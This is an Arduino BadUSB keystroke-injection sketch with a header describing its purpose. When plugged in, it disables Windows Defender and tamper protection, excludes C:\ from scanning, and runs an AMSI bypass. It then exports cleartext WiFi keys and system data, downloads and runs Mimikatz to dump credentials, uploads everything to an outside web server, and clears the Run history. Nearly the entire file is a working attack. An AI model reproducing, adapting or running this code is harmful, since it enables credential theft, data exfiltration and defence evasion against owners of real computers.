badusb-stick/badusb.ino

302 lines
8.6 KiB
C++

/* badusb.ino
* Author: Dominic Reich (OE7DRT), dominic@oe7drt.com
* Created November 25th, 2023
* Last modified: 2024-12-24T08:58:01+0100 on Arch [Odin] X1
*
* Waits 15 seconds after plugged in, then it starts to remove antivirus
* definitions of Windows Defender and disables monitoring. Right after it
* disables Anti-Tampering in the Windows-Security GUI.
* The script collects some useful information about the computer, its
* network and the currently active routes as well as listening ports and
* its processes. It also saves (if possible) the product key as well as
* saved WiFi networks. Finally it launches mimikatz and dumps windows
* secrets and uploads everything to my webserver via HTTP POST.
* It then removes the run history (Win+R) and closes the terminal window.
*
* Based on the examples from
* https://www.instructables.com/A-BadUSB-Device-With-Arduino/
*
* Following times are outdated as I added some commands which take
* a few seconds of time:
* Time until I have everything on my server: ~42 sec
* Time until script finished locally: ~49 sec
* Time until execution starts (waiting time): 15 sec
*/
#include <Keyboard.h>
#define KEY_DELAY 50 //delay between keystrokes for slow computers
void disableTampering() {
// Disable tamper protection with the Windows GUI on Windows 10
// Tested on my Lenovo T420 running Windows 10 {VERSION}
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(700);
Keyboard.println("windowsdefender:");
delay(3000);
// maximize window because on small screens the focus of the button changes
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(' ');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(200);
Keyboard.press('x');
delay(KEY_DELAY);
Keyboard.release('x');
delay(400);
// Viren- und Bedrohungsschutz
Keyboard.press(KEY_RETURN);
delay(KEY_DELAY);
Keyboard.release(KEY_RETURN);
delay(1400);
// move down to Einstellungen verwalten
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_RETURN);
delay(KEY_DELAY);
Keyboard.release(KEY_RETURN);
delay(1400);
// Disable Echtzeitschutz
Keyboard.press(' ');
delay(KEY_DELAY);
Keyboard.release(' ');
delay(KEY_DELAY);
// yes do it with ALT+j
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press('j');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(1200);
// move down to Cloudbasierter Schutz slider
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(' ');
delay(KEY_DELAY);
Keyboard.release(' ');
delay(1400);
// go ahead and disable Automatische Übermittlung von Beispielen
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(' ');
delay(KEY_DELAY);
Keyboard.release(' ');
delay(1400);
// disable Manipulationsschutz
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(KEY_TAB);
delay(KEY_RETURN);
Keyboard.release(KEY_TAB);
delay(KEY_DELAY);
Keyboard.press(' ');
delay(KEY_DELAY);
Keyboard.release(' ');
delay(1400);
// close window with alt f4
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F4);
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(700);
}
void setup() {
// Keyboard.begin();
Keyboard.begin(KeyboardLayout_de_DE);
//I recommend that you leave a short delay before start while prototyping.
//It will will give you some time to reprogram a board before it starts typing.
delay(15000);
// normal program, only run it once at startup
disableTampering();
// Windows + R
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(900);
// Start cmd as Administrator
Keyboard.println("powershell Start-Process cmd -Verb runAs");
delay(4600);
// press ALT + j to confirm execution as Administrator
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press('j');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(1700);
// If no UAC enabled, we printed j on the console, let's
// initiate a few CTRL+C's to cancel that and get a fresh
// prompt...
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('c');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(100);
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press('c');
delay(KEY_DELAY);
Keyboard.releaseAll();
delay(100);
// Disable Defender; wait a bit longer, because recent only `ershell ...` was printed
Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true");
delay(400);
// Start powershell; wait longer because the OS has to bring another window to foreground
Keyboard.println("powershell");
delay(2600);
// Add C: to Defender exclusion list
Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\"");
delay(400);
Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\"");
delay(400);
// get some information about the network
Keyboard.println("cd $ENV:UserProfile");
delay(400);
Keyboard.println("New-Item -Name \"tmp\" -Type Directory -Force");
delay(100);
Keyboard.println("cd tmp");
delay(100);
Keyboard.println("netsh wlan export profile key=clear");
delay(400);
Keyboard.println("ipconfig /all > ipc.txt");
delay(400);
Keyboard.println("netstat -rn > nr.txt");
delay(400);
Keyboard.println("netstat -anb >> nr.txt");
delay(400);
Keyboard.println("systeminfo > pc.txt");
delay(4600);
Keyboard.println("Get-ComputerInfo > pspc.txt");
delay(4600);
Keyboard.println("Reg export \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform\" prodkey.txt /y");
delay(400);
// ftp connection (windows ftp does not know about passive ftp)
// Keyboard.println("ftp");
// delay(200);
// Keyboard.println("open bor.oe7drt.com");
// delay(400);
// Keyboard.println("mimiwauz");
// delay(400);
// Keyboard.println("harschbichl");
// delay(400);
// Keyboard.println("prompt");
// delay(400);
// Keyboard.println("mput *.*");
// delay(400);
// Keyboard.println("quit");
// delay(400);
// Keyboard.println("((sc -NoNewLine -Encoding Ascii .\\Report.txt -Value(gc *.*) -join """`n""") + """`n""")");
// delay(KEY_DELAY);
// Keyboard.println("$report=gc .\\Report.txt");
Keyboard.println("$report=gc -Encoding utf8 -Delimiter \"'n\" *.*");
delay(400);
Keyboard.println("(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/rx-net.php',$report)");
delay(2200);
Keyboard.println("cd ..");
delay(400);
Keyboard.println("Remove-Item -Recurse -Force tmp");
delay(400);
// exit powershell (because the next commands have to run in a separated powershell process)
Keyboard.println("exit");
delay(2200);
// Download and execute mimikatz; then upload result log
Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\"");
// Keyboard.println("IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)");
delay(9000);
// Clear run history
Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
// Keyboard.println("Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue");
delay(400);
// show wlan passwords
// Keyboard.println("netsh wlan show profile key=clear");
// delay(8000);
// exit cmd window
Keyboard.println("exit");
delay(KEY_DELAY);
Keyboard.end();
}
void loop() {
// do nothing in loop() -- or should we restart the computer? or lock it? or delete something?
// or start a fork bomb etc...
}